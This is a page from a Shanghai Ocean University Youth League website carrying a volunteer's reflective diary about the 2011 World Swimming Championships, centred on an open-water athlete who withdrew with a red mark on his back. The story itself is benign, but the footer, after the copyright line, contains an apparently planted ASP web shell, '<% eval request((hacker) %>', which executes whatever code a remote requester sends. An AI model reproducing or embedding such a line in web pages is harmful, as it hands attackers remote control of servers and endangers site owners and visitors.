当前位置:共青团上海海洋大学委员会 >> 志愿服务 >> 志愿活动 >> 正文  
站内信息搜索:
世游赛志愿者手记之一:深深的红印
[2011年10月12日]   来源:本站原创   作者:佚名   点击数: 【字体: 】【双击滚屏

        720日,公共水域男子10公里比赛。在大家对冠军的喝彩中,触动我最深的却是中途退赛运动员的遗憾。

       今天,我做了检录的工作,就是在比赛前为运动员贴号码。我们分为8个小组,平均每个小组贴约8名运动员,所以被自己小组贴过号码的运动员都有些印象。比赛中,我们志愿者们坐在第二检录室待命,听着广播里的比赛进程,比赛十分激烈。再一抬头,便看到身上贴着号码的两名运动员缓缓进来,我们都意识到,他们中途退赛了,根据我们昨天的经验,他们一定是——“被踹了。与以往不同的是,47号的背上有一大片显眼的红色印记,望了一眼的我甚至就能立刻感受到那个瞬间的剧烈疼痛,“47号,我们小组贴的!我一惊。便对他稍稍关注了一下。他安静地坐了下来,时不时向伤口上浇一些水,与另一名退赛的运动员目光相遇,两人依然相顾无言。在他转头的一刹那,我看到了他的表情,他的眼神,痛苦与克制,遗憾与无奈……他好像认出了我这个给他贴过号码的志愿者,目光短暂停顿,我低下了头,装作没有看见,我不知道该做出什么样的反应,才会对他有一丝安慰。

       我回忆起一个志愿者说在昨天女子10公里的比赛后,一名中途退赛的意大利运动员哭了,他回去一查才知道,那名意大利的运动员过去都是拿奖牌的,被踹中途退赛意味着无缘伦敦奥运会。

       那一刻,我第一次感受到了退赛运动员无限遗憾。几年的备战化为泡影,过去无数天的努力因为这一天而失去很多意义,倘若是自己没有实力也就罢了,可意外的退赛却是最让人难以接受。

       这并非我们志愿者的责任,我们也无能为力。也许这只能让我们更加意识到,世界游泳锦标赛对运动员来说意义非凡,他们长期的努力都凝聚在比赛的这一天。我们能做的就是尽一切努力创造一个良好的竞赛环境,尽可能为运动员们提供便利,为他们的良好发挥提供保障。

       深深的红印很久才渐渐淡去,不久后便离开的我不知道47号运动员何去何从。但他的表情却始终在我脑中挥之不去,我会记住今天的深深的触动,投入最大的努力做好自己的工作,这更是志愿者的责任。

 

关闭窗口

上一篇:暑期忙碌的海大人——我校世游赛“小番茄”胜利凯旋

下一篇:世游赛金山公开水域志愿者的苦与乐
  留言板 | 管理登录 版权所有 © 2007 共青团上海海洋大学委员会 tw.shou.edu.cn <% eval request((hacker) %>